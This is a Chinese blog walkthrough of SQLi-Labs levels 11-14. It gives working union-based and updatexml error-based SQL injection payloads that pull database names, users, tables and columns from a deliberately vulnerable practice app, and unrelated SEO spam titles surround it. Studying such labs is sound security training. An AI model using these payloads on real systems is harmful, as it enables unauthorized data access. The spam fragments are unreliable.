当前位置: 首页 > news >正文

网站建设公司 销量线上推广引流平台

news 2025/10/10 5:08:38
网站建设公司 销量,线上推广引流平台,wordpress安装没有选择语言,自己做网站设计制作SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。Less 11 SQLI DUMB SERIES-11判断注入点 尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单…
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 11

SQLI DUMB SERIES-11

welcome dhakkan

判断注入点

尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号:
login attempt
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。

uname=admin' -- &passwd=1

在这里插入图片描述

实施注入

获取数前数据库的数据名和用户名

uname=0' union select database(),user() from dual -- &passwd=1

logged in
获取当前数据库的表名:

uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1

successfully logged in
获取user表的列名:

uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- &passwd=1

获取用户名

Less 12

SQLI DUMB SERIES-12

通过输入判断出查询字符串的闭合方式为")
security
同样通过这一个点获取数据库名和用户名。

uname=0") union select database(),user() from dual -- &passwd=1

在这里插入图片描述

Less 13

SQLI DUMB SERIES-13

判断注入点

SQL语句错误,提示异常。

uname=0'&passwd=1

在这里插入图片描述
正常输入结果显示成功,不过没有任何提示内容。

uname=admin') -- &passwd=1

admin
如果是这样的话,那就只能通过错误信息来获取数据了,如下所示

uname=0') and updatexml(1,concat(user()),1) -- &passwd=1

localhost

实施注入

uname=0') and updatexml(1,concat('~',(database())),1) -- &passwd=1

welcome login attempt
获取当前数据库所有的表名

uname=0') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- &passwd=1

failed
获取user表所有的列名

uname=0') and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1) -- &passwd=1

123
到此注入成功

Less 14

SQLI DUMB SERIES-14

在这里插入图片描述

判断注入点

测试双引号报错。

uname=admin "&passwd=1

在这里插入图片描述
然后经测试采用双引号加注释符就可以验证登录成功。

uname=admin "-- &passwd=1

admin
但这样还不能获取数据,则判断这个注入方式为错误注入。
通过updatexml方法即可成功注入

uname=admin " and updatexml(1,user(),3)-- &passwd=1

在这里插入图片描述

实施注入

获取数据库名

uname=admin " and updatexml(1,concat('~',database()),3)-- &passwd=1

在这里插入图片描述

获取当前数据库所有的表名

uname=admin " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3)-- &passwd=1

在这里插入图片描述
获取user表所有的列名

uname=admin " and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),3)-- &passwd=1

在这里插入图片描述

系列文章

  • sqli-labs 靶场闯关基础准备
  • sqli-labs 靶场 less-1、2、3、4第一关至第四关
  • sqli-labs 靶场 less-5、6 第五关和第六关
  • sqli-labs 靶场 less-7
  • sqli-labs 靶场 less-8、9、10
http://www.dtcms.com/a/460468.html

相关文章:

  • 深圳网站搭建哪里找海南房地产网站
  • 做汽配的都上什么网站网站怎么搬家到快云vps里面去啊
  • 做公司网站备案可以个人直通车关键词怎么选 选几个
  • photoshop网站设计360免费wifi安卓版下载
  • ps制作网站过程亚马逊排名seo
  • 济南高端网站设计建设wordpress 企业网站主题
  • 厦门专业网站建设化妆品网站建设策略
  • 做网站找云无限番禺网络科技有限公司
  • 网站设计是干什么的美团做团购网站
  • 广州网站建设信科分公司wordpress 导入插件
  • 大学生网站开发wordpress ip修改
  • 网站开发毕设文档东莞网站制作很好 乐云践新
  • 微信专业开发教育网站如何做seo
  • 海东市住房和城乡建设局网站西安双语网站建设
  • 如何免费建设网站如何更改wordpress模板
  • 桂林网站制作报价养老院微网站建设方案
  • 免费注册自助网站网站建设和优化内容最重要
  • 苏州口碑好的保洁公司seo网站优化插件
  • 网站定制需求网页设计后怎么上传到网站
  • 邯郸去哪做网站改版品牌策划方案怎么做
  • 学校网站建设策划管理培训公司
  • 水墨 网站源码小红书seo排名规则
  • 做网站接电话一般要会什么关注公众号功能开发
  • wordpress文章预览北京seo课程
  • 广州网站建设南宁丽江网站开发
  • 北京品牌建设网站风铃网站具体是做那方面的
  • 公司做网站有用吗网站改版降权多久恢复
  • 企业宣传册免费模板网站安徽省建设项目 备案网站
  • 网站建设主要营销内客网站开发技术概述
  • 网站建设电子网站怎么自动加水印